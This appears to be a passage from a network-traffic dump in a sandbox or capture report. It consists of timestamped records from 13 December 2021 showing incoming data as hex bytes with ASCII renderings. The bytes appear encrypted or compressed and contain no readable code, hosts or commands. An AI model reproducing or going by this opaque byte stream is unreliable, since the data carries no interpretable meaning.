                                                                                              2021-12-13 23:57:18 UTC7037INData Raw: 8a 4f de 61 94 ad 98 9e eb 5b b4 b6 69 53 08 21 e4 40 34 bf 83 89 d5 ba 5f 18 9e 86 ed 3d 27 a5 40 5d a0 a4 b0 03 cd f6 31 2e 6b 89 9c 64 23 1d 12 47 b6 80 74 e3 f2 0c 6a 9e 5b 0c 9b 09 97 2d 5f f0 62 a7 6f b6 af 38 40 84 ea 75 51 f8 95 a3 df a7 50 4d 12 cc 37 3e 51 a6 8e b0 fb 1b ea 8c d3 59 3a 7b cd 6b 78 ba f8 ef 93 23 cd 41 51 13 dc b2 00 92 25 d8 53 87 03 ea 03 93 9a fa 81 fd 13 98 15 fe 6f f7 14 e7 75 9b b3 f5 10 cb b3 55 91 52 05 7d eb d4 4d df 50 92 91 84 f4 66 72 01 e5 d7 bf 0e ef 95 e8 c1 02 6b b8 4e b2 47 a3 8a 64 92 69 e2 e5 73 be 52 5e b6 1f e6 64 3b 4e 5c 04 50 99 30 69 88 d1 ce 74 e9 21 42 d7 66 e3 77 dc 9c 27 c8 e6 35 a1 37 b3 ac ee eb a5 a6 c8 df a4 e9 95 94 cf 3e bb 0a 3e 1b 3f b1 25 fa 8d e2 85 df 27 f1 f7 43 96 2c f3 44 be 50 5c b1 2b
                                                                                              Data Ascii: Oa[iS!@4_='@]1.kd#Gtj[-_bo8@uQPM7>QY:{kx#AQ%SouUR}MPfrkNGdisR^d;N\P0it!Bfw'57>>?%'C,DP\+
                                                                                              2021-12-13 23:57:18 UTC7053INData Raw: 56 7d 65 65 64 64 8f fa 2b 99 23 a7 26 82 1c c3 aa 16 8e ba 2c 89 9a 4c f7 e3 94 c2 d6 ce 95 d4 0c c5 f8 5f 7c 68 bc fb 5c 96 43 b3 0b fc 75 70 b7 d9 26 0d cc 93 b5 91 7f a3 df b3 92 7b ec 6d 02 7c 8a a3 35 5b e6 3c 71 cc a7 6a d1 54 00 30 3f 9f 0b ee d6 f2 9e 70 28 ec 74 54 05 2d 20 b0 ce 84 6b f1 7b a7 b6 c4 ce 53 3b 75 c0 23 35 6f 2e a1 f4 e1 a4 f3 8c 7c 83 69 76 11 50 45 45 6f 33 4a 38 72 13 7b 85 b1 21 ae 5c a3 7b ef b9 f9 74 5a 01 48 ba 61 3f 7b e8 4a c3 3c d5 49 98 3c 64 71 77 41 a4 ff 05 ef f2 7f 43 6f ef 7c 25 f1 29 5e a7 3f e9 91 b5 1d 27 36 39 2e ce bc 86 00 3c c6 54 29 70 49 da f2 74 c8 aa 3f 57 83 98 73 37 1d 5a 41 a9 58 2e ff 81 65 9a ba 13 d0 d7 88 a2 b0 d1 a5 25 e6 69 06 0d 78 18 d7 78 64 72 71 4c 64 8c c2 8a 5c e7 6e df 6b 0b 2c 04 c6 ce
                                                                                              Data Ascii: V}eedd+#&,L_|h\Cup&{m|5[<qjT0?p(tT- k{S;u#5o.|ivPEEo3J8r{!\{tZHa?{J<I<dqwACo|%)^?'69.<T)pIt?Ws7ZAX.e%ixxdrqLd\nk,
                                                                                              2021-12-13 23:57:18 UTC7054INData Raw: 71 ea 3c 54 aa 3a 27 b6 c1 cd 89 b9 97 00 23 73 03 c6 92 4c ca 2f a9 49 df 62 db 69 1b 05 c3 27 a2 6d d0 c6 fc f8 37 76 93 80 f5 25 d2 03 84 98 e6 ec 1a 1d 38 1e 79 a6 ce cf 78 cd 59 0c f0 88 a9 4e bd 87 09 48 4c 4f d4 f0 3a fe 5d 11 82 3a 5c 95 8f 8d da 4d 5d 5e d8 92 c2 ad 7c 9b 17 9d da e0 de 77 d3 c6 62 9b 41 2e a2 ba 0f 3b b6 2a 4d b7 7e 27 d9 92 83 26 14 1e dd b5 8e c4 52 15 61 e3 c3 8c 1a 7a a1 c4 83 e7 c0 a5 00 82 48 23 0a b1 12 8f 19 00 2a a9 fd 1a 3f cf 0d 60 95 43 6f 49 3e 5b bf 51 b8 22 a0 79 1a 3d 2d c2 6f ea 4a 77 a4 07 3b a1 c1 8b ea 48 70 a7 12 f9 95 3e 23 57 eb ea ab 7b a4 8c 9d 30 14 bb 77 1e ca f3 c9 90 c5 f2 ee 2c 90 38 4c ed 95 b5 30 40 2d e1 df 27 6b 09 2b 7c ea fe fc 1b fb f3 e8 15 a7 c9 c9 11 f1 9b a9 1c ad 0b 8d 10 ed 40 a1 2a 12
                                                                                              Data Ascii: q<T:'#sL/Ibi'm7v%8yxYNHLO:]:\M]^|wbA.;*M~'&RazH#*?`CoI>[Q"y=-oJw;Hp>#W{0w,8L0@-'k+|@*
                                                                                              2021-12-13 23:57:18 UTC7070INData Raw: 27 c3 71 b7 c7 44 ab 6d ac e5 cb e2 27 4b 1f 28 a2 03 cb 73 8f 59 93 bc af e9 09 9f a9 cc 91 ea a3 03 e8 0b a8 72 7e a8 14 19 90 d2 7f 12 d5 b6 05 00 ed 4f 30 bf d3 6c cb 3f 4c ed af 2c 15 76 8a cf 91 df fe ac f5 da cf 04 42 da 14 45 da 1e 73 6d 83 91 d7 af e7 da f8 f3 62 a3 a6 76 ca e8 58 fa d4 07 03 cd ed cc 10 07 63 63 6f f4 98 82 af 3b bb 9a b7 e9 fe 46 e3 40 7a 67 33 80 2f 96 56 93 f2 d0 ef 34 13 da f3 0a 9a 04 01 df 74 78 8c 4c f5 c7 66 3b a5 60 9b 36 6e 67 08 ae 83 e5 28 cf 93 e7 bf 89 63 22 eb 90 7a 73 b3 a2 e0 60 a8 f7 68 6e 00 96 55 8e 83 00 cb c1 1d 55 06 a2 99 e2 70 0d 49 9d 1c 68 1b 8b f5 32 0b 42 e7 e8 40 b5 9c f7 d5 45 d5 c9 3e e4 9e d0 d4 7e a9 55 0f 37 d1 93 de c8 4e a9 04 09 b4 53 99 72 54 88 34 86 0b 05 02 f4 04 4a 25 e5 26 00 8c 1b 24
                                                                                              Data Ascii: 'qDm'K(sYr~O0l?L,vBEsmbvXcco;F@zg3/V4txLf;`6ng(c"zs`hnUUpIh2B@E>~U7NSrT4J%&$
                                                                                              2021-12-13 23:57:18 UTC7071INData Raw: b6 e2 9c fd 74 b9 90 1b b7 fc 8e a9 99 63 e1 b1 b5 33 41 32 ac 0a 05 f4 79 19 1c 38 c9 0c bd 37 e8 64 d4 0c b7 3f 48 ff 79 da cc f9 7e b5 fa 93 f2 fc 2f f8 29 8c 92 c3 9e f1 b5 50 43 c0 9d fc 88 c7 69 fc 13 9f 56 3d 0b 43 d9 dc 94 2e fb bb 78 09 14 3c 7e a8 9d d2 ae b4 00 7d b8 bd ff 64 6b 01 8f a3 cc 85 96 3e 7f 26 c5 48 ba 54 b5 01 ec 0c 7f 7d 5e 8d 7a 91 73 e3 08 b0 12 51 a0 82 6e 42 02 74 21 6f fc e1 c7 c2 b4 e6 07 8d af 7b 0d a2 f2 fd d6 99 87 d1 f9 83 ca 4d ae ba a8 98 70 6e 51 a7 b2 2e 68 14 b0 91 0a 5e 7a 52 f6 77 82 ee 9c 18 58 a4 ec 72 14 b8 a5 a0 7d a2 d5 1b d3 56 db 80 88 34 79 77 7f 71 12 67 b1 b5 78 ec 85 9c 75 39 9f 32 3b 4a be 00 0e c6 0f 67 01 44 7d 01 14 c3 b0 9f 94 71 d2 20 ce 67 aa 2d f6 8b 28 ff 30 2b d9 68 61 84 49 85 48 18 f0 b3 6b
                                                                                              Data Ascii: tc3A2y87d?Hy~/)PCiV=C.x<~}dk>&HT}^zsQnBt!o{MpnQ.h^zRwXr}V4ywqgxu92;JgD}q g-(0+haIHk
                                                                                              2021-12-13 23:57:18 UTC7087INData Raw: 0e 5a af 30 a5 d1 e7 20 46 6a ee 9c 7a 54 ab ce 8e 19 05 4c 01 7a b6 e2 05 48 64 97 96 96 0d ca 2e c4 6f fd 74 80 4a 7b bb a8 01 5f 18 a1 48 c9 ac 4e 0f 54 7c 8b 36 1e 62 61 10 a1 f2 c8 38 f0 eb f7 8e 32 ce 1a b8 f1 b6 20 05 1e 8a c3 cc 09 ee a2 14 4e 23 4c 23 c5 64 0c bc c8 18 40 d4 b3 9b 67 ec ed 8d 8a d5 ea 87 4b ef 83 0f 05 1d 23 ee 9c d8 f9 e8 a1 c6 0f 61 5b 0b 3f 9c 58 7f 9a 5a bf 6a f8 74 31 1a 64 5c 60 d7 fd 1f 8c 18 28 a3 f7 67 eb 20 9f c2 b2 41 84 f3 a2 05 63 1f 12 8c fc c0 27 6e 92 ca 91 eb 75 fd dc 80 65 c6 56 74 1f 91 f5 81 4a 72 f6 83 3b 74 0b 7f de ed aa eb 8a e5 a6 54 e3 61 4b 98 37 a3 8a 60 a9 75 c5 b2 5d 1e b9 0e a0 71 81 df d2 e5 11 19 52 e7 1f 3c 2f 41 2d 37 b4 48 89 95 52 dc c5 29 8b 2d 24 c1 65 f0 f7 80 bb 91 b7 46 0f 54 1d 95 33 2c
                                                                                              Data Ascii: Z0 FjzTLzHd.otJ{_HNT|6ba82 N#L#d@gK#a[?XZjt1d\`(g Ac'nueVtJr;tTaK7`u]qR</A-7HR)-$eFT3,
                                                                                              2021-12-13 23:57:18 UTC7088INData Raw: 0f 84 39 44 83 2b 05 f0 ba 1c 49 91 f2 b6 3c 4e c7 ac 36 c0 28 ed d9 ae ba ba ba a9 53 63 02 c7 d3 1d 13 4b ec 32 7c 59 cc 6f b8 fe b4 6b 37 33 c8 4b c6 ec 4d ec d8 04 c4 a7 39 7b b2 0a a7 05 9f 47 3b 44 2a 0f 80 91 c5 2d 52 86 c0 32 b9 ab ae 96 8c 38 39 85 09 8e 22 c0 c6 3e bf 6e c4 fd 9f b5 37 08 d1 b2 ac 82 62 11 5c e8 3d 5a 03 44 aa 9e 3e cf 67 87 48 f6 b9 64 48 fa 9a 1a 0f 26 c7 95 16 e0 47 f9 c8 d5 26 cc 2a dc f8 6c d8 2c a6 be cb b6 1c 2e 3f ac 1b 5c 32 79 0c b3 cf 4e 50 a8 53 84 3a b4 76 12 f0 bd 44 cb 7f 6c de 0c 34 5d f8 f7 0a fe 6b 63 0a 25 e0 a7 44 ec d8 cb 9f 14 92 69 62 73 d0 c2 60 1e 31 52 1c 39 da fe 6c c4 1d 58 62 b6 b9 2b b0 d8 c8 10 50 f2 18 d4 31 03 d4 d2 39 4d c1 52 84 a2 d1 30 ea e0 ae f3 31 51 77 d5 e6 b3 6e b0 cd 6a 44 0a c0 20 61
                                                                                              Data Ascii: 9D+I<N6(ScK2|Yok73KM9{G;D*-R289">n7b\=ZD>gHdH&G&*l,.?\2yNPS:vDl4]kc%Dibs`1R9lXb+P19MR01QwnjD a
                                                                                              2021-12-13 23:57:18 UTC7104INData Raw: 72 66 63 68 00 eb a3 1c 15 51 1f cc 8d 6d 3c 5c db 91 81 21 d4 70 87 6c 1b 3a 8a a3 26 d3 5d c7 9d ac ee d6 f3 b2 3b 2f 3a 93 16 e3 50 cb 0b c8 3f 9b b8 9a e3 67 40 bc 0b ad 1c f7 b5 35 13 75 76 1c e1 40 50 b8 de 77 0a 26 85 2d 8b 44 d1 9e 61 2e e9 1b cc 6f 97 f6 fb 0d f0 0b 4b bf 79 ad a9 d1 36 6b 97 69 f3 69 7f 20 7a 66 07 dc ed ff 12 ed d4 0f 07 c6 00 ce 9b fc 2d a2 40 7a 70 42 98 ef 70 e5 5b c1 cb ca 32 70 40 9d 2f 12 c3 8b 08 d6 85 2c 10 b9 f5 1f f1 7e 8b c2 d4 42 eb d9 d6 60 6e 94 25 37 fe ad 05 1f 9b a3 86 36 23 48 fe 6f 3a 91 e5 6a 60 de 26 ad f6 54 a1 c2 33 ea d2 de a7 46 93 d5 e0 31 2b 44 41 6a 3b 34 b6 c8 5b 8b 49 3a 28 1e 94 ba df dc cc b8 1f 83 bf c8 b5 87 b2 2c 5d 11 0a c6 8e 22 8a 8c b3 f9 50 d8 d2 e7 1d d0 fc c8 06 f7 60 17 d8 ae df 04 6e
                                                                                              Data Ascii: rfchQm<\!pl:&];/:P?g@5uv@Pw&-Da.oKy6kii zf-@zpBp[2p@/,~B`n%76#Ho:j`&T3F1+DAj;4[I:(,]"P`n
                                                                                              2021-12-13 23:57:18 UTC7105INData Raw: 69 3b fe bd fa 53 ab c2 e2 ab 8d 71 16 4c 97 dc d5 bc 9c 93 53 dc 25 83 46 db c1 65 1a a1 56 61 af c0 d2 f7 7e 10 8d d1 fa af d9 7a 81 a2 df e9 87 bf 7a 64 97 8e 5a b6 b6 26 9f 4f c7 ac 1c a5 39 6d 9a 9b 62 91 3c f4 87 29 01 e4 8a d8 ea 58 c1 06 e0 11 f2 b4 47 e1 e5 e5 d3 9b c3 69 83 b6 b6 3d 9b b0 de 83 c2 2f 87 a8 9b 34 41 95 e0 73 38 92 fe 9d 7a 76 3a 6e d3 75 3c 91 2c 3c 39 20 51 63 64 cc d1 f7 73 24 f9 a4 dd 07 8f d4 b0 96 7e ec 4d 07 a7 2f 69 60 03 2f df 51 21 4c 52 35 f7 02 5b 08 ab fa f1 41 d0 25 fd 03 ec 59 e6 00 f4 51 04 1f bf a5 32 ac 92 1d 17 e6 33 a1 ff ad 08 3b 15 d3 3a 7b 25 6a 4e f4 6e bd 87 09 67 29 16 ec 0d c4 f5 cd 27 39 cc f5 7e d2 01 c3 f4 92 1d 94 b2 98 f9 40 dc 58 4a c8 d6 31 c0 7c a8 8e 0a 76 10 bf 95 76 57 6d 8c fa 4f 50 35 23 69
                                                                                              Data Ascii: i;SqLS%FeVa~zzdZ&O9mb<)XGi=/4As8zv:nu<,<9 Qcds$~M/i`/Q!LR5[A%YQ23;:{%jNng)'9~@XJ1|vvWmOP5#i
                                                                                              2021-12-13 23:57:18 UTC7121INData Raw: 3b 2c 9a 89 c5 80 d1 72 04 e9 77 ca bc 97 2e e7 e6 ba 1c c9 5a c9 29 a3 60 67 aa 3f 36 73 6e 4c 08 c4 22 c2 f8 ff 03 51 ca 7b 24 e8 ca 3c c1 71 79 c6 d7 d9 1f 38 5a f1 fd 41 fc 6a 20 37 b3 fe c5 04 cd 6c 7e 03 92 ae ac 57 4b ed 24 fd b3 9e 74 b7 00 b3 d5 e8 6f d7 ec 4e 1e 76 64 c7 ba 93 ac f4 3a 60 69 64 20 e6 77 e6 55 f1 11 0f c8 30 51 60 2f af 74 13 c7 2c 75 b8 65 74 54 c2 6b d5 91 07 cc cf 5c 04 7f 77 90 be 36 50 b4 0d f2 55 59 6b 3f 94 d8 af 27 d7 37 cb ff 4b d1 8e 16 da 80 5a 10 93 9a 9f bd 89 f2 4a d5 ad 5d 20 78 03 d3 be b2 20 63 b5 83 6d 2f 82 f8 f1 75 47 a9 8f 4a ef 10 25 bb 53 1a 37 36 50 47 c3 e7 aa 43 da 52 24 75 4b 98 d8 69 b2 49 9e 52 cd 85 95 9d f3 f8 fb 7a 60 38 cc de f1 67 31 5d 60 e8 da 71 ae 1d 1b 1d 38 bb f2 f5 e4 3c d2 fe 10 5d f5 f2
                                                                                              Data Ascii: ;,rw.Z)`g?6snL"Q{$<qy8ZAj 7l~WK$toNvd:`id wU0Q`/t,uetTk\w6PUYk?'7KZJ] x cm/uGJ%S76PGCR$uKiIRz`8g1]`q8<]
                                                                                              2021-12-13 23:57:18 UTC7122INData Raw: e9 01 6b 9a 51 dd 10 29 a5 83 80 89 b7 89 f2 01 bb dc a5 72 dd 71 a7 f3 a1 2a dc 4f 0b 34 12 d0 27 05 03 b4 ae 03 0d 8a eb b0 e0 67 44 bd d2 bb b4 66 5e cd 23 2c 0c 7e b2 d3 8a 55 bf de 3e 07 37 7b 95 25 69 f3 40 b4 cd 50 84 95 2a ec 60 d1 80 a4 58 f7 31 e3 0f 70 ed 87 f1 ed 0b 7d 25 66 3e 72 09 01 1a c5 15 e3 86 6b e2 40 32 01 07 5c 4a 6e 38 7c 6a c0 2a 6a 04 a5 92 07 be 2a 4d b6 d4 82 aa ee dc 78 21 8c bb c7 36 c5 64 a5 17 5e 3a 0f e9 86 3d 52 45 c0 d5 c8 bf b9 cd b8 33 db b1 8b 53 72 d9 5d 88 e2 2b 55 55 38 ac b6 db 70 d4 fb 0e 17 f9 7c 31 6a 61 7c 14 dc 06 62 50 57 d5 1b dc 6e 69 49 5c 3c 95 2c 8d 3b 6c e1 f2 53 bb 83 44 05 85 91 bc 2d 7b 62 52 fb 89 55 1c b9 ba 08 9c 1e 35 25 e6 09 e1 5e bd 25 31 a1 34 66 2b 73 00 5b d8 09 4b 3b 8f 03 0e 1b f6 f8 24
                                                                                              Data Ascii: kQ)rq*O4'gDf^#,~U>7{%i@P*`X1p}%f>rk@2\Jn8|j*j*Mx!6d^:=RE3Sr]+UU8p|1ja|bPWniI\<,;lSD-{bRU5%^%14f+s[K;$
                                                                                              2021-12-13 23:57:18 UTC7138INData Raw: a0 7b e9 e6 2c ab 5e a0 60 a3 bb f5 7a 0b fa 93 6a 5b c7 f1 19 fd 65 6e 8d b2 63 88 28 5a 1d 52 c1 d0 64 1b 62 82 ab 47 04 d6 4c 19 d7 b0 99 ff ab 46 60 79 43 d1 71 2c ff e9 f4 60 69 c0 aa b3 21 ac 4e 49 13 f0 78 45 e0 a8 e0 82 89 9a 6b 51 ce c4 4d f3 e4 89 70 3a 58 01 c0 56 59 e2 af 40 8e 09 14 b7 38 9f ef ef 42 25 ee 89 22 e1 a8 b3 93 4e c7 2a 06 64 be 88 7b 5e f1 54 ff 3a e9 90 b0 73 42 72 d5 fe 0c 60 b1 cb 4b 36 5e 37 c2 81 17 7e fd 66 af b9 59 42 48 1d ff c4 3c 2d 64 95 13 dc d3 2d 9b 82 06 67 8d ec 3b 54 b9 93 1f 7b bc 05 72 59 f6 17 24 d4 7a dc f6 1f e8 35 b8 a1 ab b4 a3 14 66 6a 8d 78 d7 69 ac bd 7a cd 73 5e 1a b8 d2 6e 7c eb 29 a1 2e a4 de 8c 36 8c 77 b9 ec 6e 13 17 ef ee 76 8d 11 c0 4e 0e ea fa ea 67 f6 85 06 4e 44 44 c8 fb 4f f1 4c 07 c4 07 e3
                                                                                              Data Ascii: {,^`zj[enc(ZRdbGLF`yCq,`i!NIxEkQMp:XVY@8B%"N*d{^T:sBr`K6^7~fYBH<-d-g;T{rY$z5fjxizs^n|).6wnvNgNDDOL
                                                                                              2021-12-13 23:57:18 UTC7139INData Raw: 30 e5 50 db a1 8a 12 23 1d f1 08 0f b3 aa ca dd 2b 3b bc 17 e9 ae 7d e4 03 48 0c d0 30 e9 62 ef 9a 68 38 36 84 73 eb 00 f6 3a bd eb c7 c2 f2 fa 2c 60 d2 b5 3a 69 dd ca 84 e5 27 de af da 03 0a b3 af 1f 74 fc ab ae 9b 76 c9 32 9d be 0c 07 4c e8 68 01 00 cb 5a af e2 c9 db 69 c3 90 d6 3c 55 b9 92 89 c8 0e b8 dd 2c 19 19 a4 cf 53 46 ec 66 f3 a6 5d 40 14 c5 b1 a8 62 fc 83 e7 72 5a c5 62 b3 b1 a2 76 6b 56 99 2c e5 24 77 e2 c6 71 10 ed a1 94 4b b0 50 fb 22 60 9b d2 7c 4d 1a ef 3e 52 5a 46 fe 40 f3 35 76 f2 68 06 24 4a ce 56 97 59 2d 5e 23 0b 67 ff 0c 3c 35 f4 85 db eb a5 9a 99 b7 29 7d 6a 42 cc 99 5f 9f 55 c2 c2 46 a4 d3 78 21 60 7b fb 65 50 69 d9 07 8b dc e8 2d 6e 19 07 25 2e c3 9a d3 55 42 c0 24 9b fd 70 4a 96 b2 2f 28 40 4b 1e 54 83 1f 7c 89 7d 24 47 c4 fa 88
                                                                                              Data Ascii: 0P#+;}H0bh86s:,`:i'tv2LhZi<U,SFf]@brZbvkV,$wqKP"`|M>RZF@5vh$JVY-^#g<5)}jB_UFx!`{ePi-n%.UB$pJ/(@KT|}$G
                                                                                              2021-12-13 23:57:18 UTC7155INData Raw: 23 f1 07 a6 bf cb 8f a0 14 37 a1 89 36 ab 59 a3 84 85 d1 8a 5c 7c 89 f1 19 4e 9e ea 1c 99 6e ee da 33 d5 ed 3f fa ca 16 32 5f e8 4c 7e 60 4e 47 2b 34 e2 fb a6 08 51 00 f5 2a d0 af 11 19 aa 4b 58 1e a1 5c 64 c4 eb b8 31 06 69 9f a0 df e4 85 8f 0e 1c 5a d2 19 ba 98 55 ea 97 fc b9 0d 86 f7 c6 b5 6e dd 82 83 0e 66 ad 52 9e ef 92 1f c4 bb c1 f3 54 a3 ed e2 34 9a 11 14 3f 75 bf 1a 55 46 44 e3 ff a2 d1 18 aa f1 61 8f b4 23 3b d8 9a 4a ad 24 0a 26 82 e2 03 c6 76 73 1a f1 3f 37 df a3 ed 47 a9 5e 6b aa 1e 06 e2 8c fc 00 95 cb 59 ab 68 14 46 90 97 a5 5f 50 d3 1a ed 4d cb d8 87 65 35 82 44 81 07 af 6f 4f 03 e3 d3 e4 63 d8 30 17 71 d7 88 94 f4 44 d7 bc 5f 84 16 fb 08 72 d2 80 b8 5a c1 20 8e 94 ca 36 6d 7b 2b fc 97 a0 7d 7c 56 ef 87 8b 3c 0d 6c 23 9d 58 c7 3d 97 20 5e
                                                                                              Data Ascii: #76Y\|Nn3?2_L~`NG+4Q*KX\d1iZUnfRT4?uUFDa#;J$&vs?7G^kYhF_PMe5DoOc0qD_rZ 6m{+}|V<l#X= ^
                                                                                              2021-12-13 23:57:18 UTC7156INData Raw: e9 b1 e1 60 99 41 11 d3 b5 00 0f 3d 00 69 aa e6 82 bf 76 e8 9e 5d 86 8e 7f eb a2 30 f8 4f b4 bf 29 57 9b 0e 4b ff 23 6a 46 47 6d 8a 03 3c 34 c3 e4 e0 35 30 51 9a 2c 0d 70 8d 79 ad 51 ac 41 a9 e7 e2 dc 55 97 52 6e f6 d5 38 52 b0 46 86 75 e2 6a b9 8c 73 45 4a ed 7c dc 57 7e 16 11 27 e0 da 9c 5f 8a a7 f2 30 07 58 88 21 8d 1c e2 9a 86 a0 2e 39 91 b9 1e 4f ba 40 5a 13 a4 b2 94 5f de 7b db d3 79 e0 16 ef f2 bf 91 91 41 bf 6e 68 28 df 1e 71 ce 43 9d c1 1a 6d a1 fd 4d 72 9d ed e3 16 6c 87 7a 70 95 01 6e 50 64 c8 dc 54 0b 1b fc 42 84 aa 93 6a 73 1e 3b 25 f9 c2 69 73 9d 16 8e b5 3b c2 dd a3 05 50 0f a4 21 56 09 f2 39 0f fa 4d d9 4a ab 50 3b 48 b1 6a 9a 88 0d 17 c6 99 17 af ef 44 c4 dc 7d 9a 80 09 84 9f 92 d3 da 73 99 1d 6f 65 5d 98 58 b5 bd 1a 47 05 69 54 05 69 02
                                                                                              Data Ascii: `A=iv]0O)WK#jFGm<450Q,pyQAURn8RFujsEJ|W~'_0X!.9O@Z_{yAnh(qCmMrlzpnPdTBjs;%is;P!V9MJP;HjD}soe]XGiTi
                                                                                              2021-12-13 23:57:18 UTC7172INData Raw: dc 3d 86 3e 8a cd c8 52 e2 a1 8e 72 21 37 9c c1 ca e6 2c 73 be 54 9b f2 7a 1f d1 1d e7 32 23 6a 99 bf cc c6 39 3b 9a c4 6f 90 dc eb cb 7f 77 ed 19 1b ab cf 71 d4 4e f3 7d 73 ee 38 ab a5 ec 19 68 72 e3 47 0e 12 8c 7a 7a 71 48 00 9d 46 cf f2 9e 8e e6 91 84 29 7f 31 16 80 66 a2 8c 01 3e 5c af 8a 47 75 47 82 09 d2 64 ea e2 e7 b3 23 0b 15 3a f4 09 7a b9 42 a1 e4 97 5f 8e c2 54 81 09 b8 14 4a 67 ac f1 d3 c3 ff ff fe 2c d5 25 03 79 e9 5e cc 35 ae 05 87 54 2a c6 6b 5e 86 03 95 48 49 30 7a db d7 79 b4 e0 f3 37 80 f5 27 72 80 8a ea da 7b dd aa c1 de 8d fc cc f4 73 20 56 a2 91 ad 9c 14 09 c1 b8 98 56 27 85 5f 31 e7 e4 8e 2e 25 8f 80 a9 7b 8f e0 c2 05 a9 a1 da f6 49 c1 36 5f a9 9d 18 e7 85 c9 0d b0 b2 97 f3 00 9d be 2e 2c 33 36 9d 6a 5e 36 4d 7d e9 d5 c1 d7 af 00 22
                                                                                              Data Ascii: =>Rr!7,sTz2#j9;owqN}s8hrGzzqHF)1f>\GuGd#:zB_TJg,%y^5T*k^HI0zy7'r{s VV'_1.%{I6_.,36j^6M}"
                                                                                              2021-12-13 23:57:18 UTC7173INData Raw: 49 77 8d 90 53 82 e0 69 5b fa f1 29 60 3c a9 27 b3 56 8f 3f de 84 6c 48 9a 36 d8 9c 0e f6 3e 58 e7 00 ff 00 91 a3 ac d7 48 93 06 59 9c 44 39 ae c8 52 16 0d 9b 65 08 42 19 c2 b1 69 0a b1 88 4e 6f bf b8 62 50 65 2f 10 f4 a9 5e 31 34 5e 5d c6 36 60 8d 77 fa 9d 03 71 61 27 b0 d9 5d 62 45 69 33 f3 14 fc 4e a7 5e be 72 e6 c1 55 db 85 49 c2 ee 51 89 c1 83 5b cf e6 3c b3 65 97 60 d2 0e 72 96 19 ad bd 3a c2 7b c8 b2 43 b5 18 e1 16 c3 48 96 15 ea 9f b3 41 c6 51 16 0d 7b 3a c7 e4 2b 1d e3 79 9e 09 f5 1c d0 ce 86 f0 c7 63 ef a4 0b 20 8c 09 7b 78 41 d0 76 1a 6c 0b 2a 92 f9 0d 5b 58 33 d9 e1 d8 6c 7d 16 f5 43 05 94 6e fe a9 cf 58 bd 91 df 97 53 bb 14 1f 5f 0b 62 42 e3 6c a9 6e 8a 29 e1 e1 52 90 b0 ba 01 a2 47 16 41 fc 2b c9 2a d8 a3 a3 97 e8 35 c9 a4 95 02 f8 4e 13 7a
                                                                                              Data Ascii: IwSi[)`<'V?lH6>XHYD9ReBiNobPe/^14^]6`wqa']bEi3N^rUIQ[<e`r:{CHAQ{:+yc {xAvl*[X3l}CnXS_bBln)RGA+*5Nz
                                                                                              2021-12-13 23:57:18 UTC7189INData Raw: ed 7e 13 15 f3 3c 23 c3 90 50 96 38 ec 34 f3 ab c5 7c a6 ec 49 38 7b 67 4c 13 17 79 b9 ce be 0b c5 74 29 98 53 b9 42 97 ec c5 ad f9 ca d8 11 cd 94 35 01 29 20 55 d3 b0 ca 4d c9 a8 61 17 8a 1a cb c6 ad 5f 34 e0 5b af c3 5e 4e d8 74 39 f3 4b 84 8f 05 f8 e6 f4 16 28 92 dd c9 8c 1c 02 48 05 9a a9 55 48 03 89 2e 99 78 9f 2c 89 5a 49 77 d0 c3 ef 81 7c f9 d7 a9 5e a1 7d 0a 50 ed af aa e7 a0 7c 8a 8b 6f a2 be ef 00 c5 4c 4f ce 29 ef 1f 96 b7 9b 93 d5 3e dc 5b 02 85 a4 04 b2 68 69 40 7b 8d bd 71 39 de c1 1b 33 90 00 9c 37 36 71 c5 96 e3 90 9b 62 4f 2c d9 db c6 dc 30 6e a0 ba e9 a8 78 bf 5c e9 61 dd bf 29 93 b2 74 50 db 64 ee ac f1 00 04 d5 b2 6e 3b 2a 17 a8 97 fe 9f fe dc c0 4c 93 6b ce bc 52 46 2a 78 2a ae 80 c3 2a b6 23 dd 6b 42 6a a8 fb 3a 22 fb db 3d cb f8 53
                                                                                              Data Ascii: ~<#P84|I8{gLyt)SB5) UMa_4[^Nt9K(HUH.x,ZIw|^}P|oLO)>[hi@{q9376qbO,0nx\a)tPdn;*LkRF*x**#kBj:"=S
                                                                                              2021-12-13 23:57:18 UTC7190INData Raw: da a7 21 f7 25 75 54 42 d4 14 45 21 13 1c cc cf ef ce bb 1b ba 4d 98 13 02 78 b8 33 aa e5 7b f1 cc 05 a3 ab d8 02 a6 47 da ca d7 c4 d0 56 7d 26 0d 87 ae dd f9 92 ec af 6a 4b d2 53 1e 27 ae 71 42 48 cd e3 24 92 f0 52 2e dc 12 03 8b 63 cb dc 93 7b 59 31 58 0e c4 84 85 50 1c b2 bf a6 a2 d3 94 78 82 d4 67 0c 2c 87 07 e8 24 d2 67 af ff b5 f6 41 40 cb ee 0d e0 10 65 61 5a 52 83 61 97 46 c5 e9 21 4b 62 dc f1 2e 77 be 34 80 5c bc b3 1f 5d 1a 47 75 a0 c5 a9 73 07 b1 b0 32 99 98 74 ee 20 72 d7 e3 84 ae 61 c4 39 7d 31 7d f5 6c 94 47 d5 84 23 5d a4 71 d6 76 4e f0 01 89 50 f9 d1 56 ab 1a 59 10 07 62 b3 70 4a 06 ac 04 11 e0 50 6b 74 80 a2 cd a0 26 1f 79 71 ba 19 90 43 96 35 63 33 d9 df 77 a3 3d 51 5b 2e a0 9a ba 32 10 63 c4 e5 c8 47 31 d6 ad 1f aa 17 d2 36 7f 48 b1 43
                                                                                              Data Ascii: !%uTBE!Mx3{GV}&jKS'qBH$R.c{Y1XPxg,$gA@eaZRaF!Kb.w4\]Gus2t ra9}1}lG#]qvNPVYbpJPkt&yqC5c3w=Q[.2cG16HC
                                                                                              2021-12-13 23:57:18 UTC7206INData Raw: f9 21 3d 76 45 fd b6 f8 1e 45 34 3a 52 1a 39 e4 a3 14 a5 10 95 53 70 48 4e e5 e3 a2 f0 88 df 28 45 a4 93 2e 26 1c 69 1a f2 4b db 0d b2 55 a0 f4 12 68 68 6b 94 87 01 a4 d1 c6 bb 1a 84 ce a6 7a 1e 71 a9 c3 4c bb 8c 09 70 76 7b 4c 7f ed 29 a8 81 b9 b7 fe ee 0f 4b 87 85 37 7b c5 f4 7a 2d 48 db 4a 35 6d 7e 3b f8 66 9f 77 fe 75 c0 24 f7 32 7d 28 b9 d3 85 55 0c 72 b4 9f da 5e 98 17 45 8a dd b3 ff f5 fa 75 20 45 e4 47 78 e4 af e6 ed ef 01 1b a0 aa 0e 94 9a 3d 23 5b 29 81 56 d3 c0 c5 1c ba 39 fa 5b 11 0d 88 74 c6 85 c2 86 41 2a 20 b5 88 0f bb b4 c2 16 4f b1 69 41 e9 0b 2b 18 84 31 c3 a5 b7 a1 f6 a0 9c cd fd 1f 71 f8 